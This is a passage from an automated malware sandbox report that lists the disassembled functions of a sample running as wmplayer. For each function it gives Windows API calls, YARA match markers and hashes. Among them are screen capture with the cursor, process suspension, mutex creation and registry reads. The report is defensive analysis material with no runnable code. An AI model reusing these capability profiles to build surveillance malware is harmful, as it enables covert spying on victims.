                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                            • String ID:
                                                                                            • API String ID: 1815803762-0
                                                                                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                            • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                            • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                            Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                            • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                            • ExitProcess.KERNEL32 ref: 0044258E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                            • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                            • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                            Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                            • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                            • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                            • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                            • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                            • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                            Function 0041ACC1 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                                                            • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CloseHandleOpenSuspend
                                                                                            • String ID:
                                                                                            • API String ID: 1999457699-0
                                                                                            • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                            • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                                                            • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                            • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                                                            Function 0041ACED Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                                                            • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CloseHandleOpenResume
                                                                                            • String ID:
                                                                                            • API String ID: 3614150671-0
                                                                                            • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                            • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                                                            • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                            • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                                                            Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .
                                                                                            • API String ID: 0-248832578
                                                                                            • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                            • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                            • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                            • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                            Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .
                                                                                            • API String ID: 0-248832578
                                                                                            • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                            • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                            • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                            • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                            Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                            • String ID: <D
                                                                                            • API String ID: 1084509184-3866323178
                                                                                            • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                            • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                            • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                            • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                            Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                            • String ID: <D
                                                                                            • API String ID: 1084509184-3866323178
                                                                                            • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                            • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                            • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                            • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                            Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID: GetLocaleInfoEx
                                                                                            • API String ID: 2299586839-2904428671
                                                                                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                            • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                            • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                            Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                            • String ID:
                                                                                            • API String ID: 1663032902-0
                                                                                            • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                            • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                            • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                            • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                            Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                            • String ID:
                                                                                            • API String ID: 2692324296-0
                                                                                            • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                            • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                            • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                            • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                            Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                            • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1272433827-0
                                                                                            • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                            • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                            • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                            • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                            Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                            • String ID:
                                                                                            • API String ID: 1084509184-0
                                                                                            • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                            • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                            • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                            • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                            Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                            • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                            • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Function 00417F9F Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                              • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                            • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                            • DeleteDC.GDI32(?), ref: 0041805D
                                                                                            • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                            • GetCursorInfo.USER32(?), ref: 004180B5
                                                                                            • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                            • DeleteObject.GDI32(?), ref: 004180FA
                                                                                            • DeleteObject.GDI32(?), ref: 00418107
                                                                                            • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                            • DeleteDC.GDI32(?), ref: 0041827F
                                                                                            • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                            • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                            • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                            • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                            • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                            • DeleteDC.GDI32(?), ref: 0041835B
                                                                                            • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                            • DeleteDC.GDI32(?), ref: 00418398
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                            • DeleteObject.GDI32(?), ref: 004183A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                            • String ID: DISPLAY
                                                                                            • API String ID: 1352755160-865373369
                                                                                            • Opcode ID: 22c96b6163cb50d8b2a0e7298f69cab473e7aa59f92580ce48d75f9de49cebd4
                                                                                            • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                            • Opcode Fuzzy Hash: 22c96b6163cb50d8b2a0e7298f69cab473e7aa59f92580ce48d75f9de49cebd4
                                                                                            • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                            Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                            • ExitProcess.KERNEL32 ref: 0041151D
                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
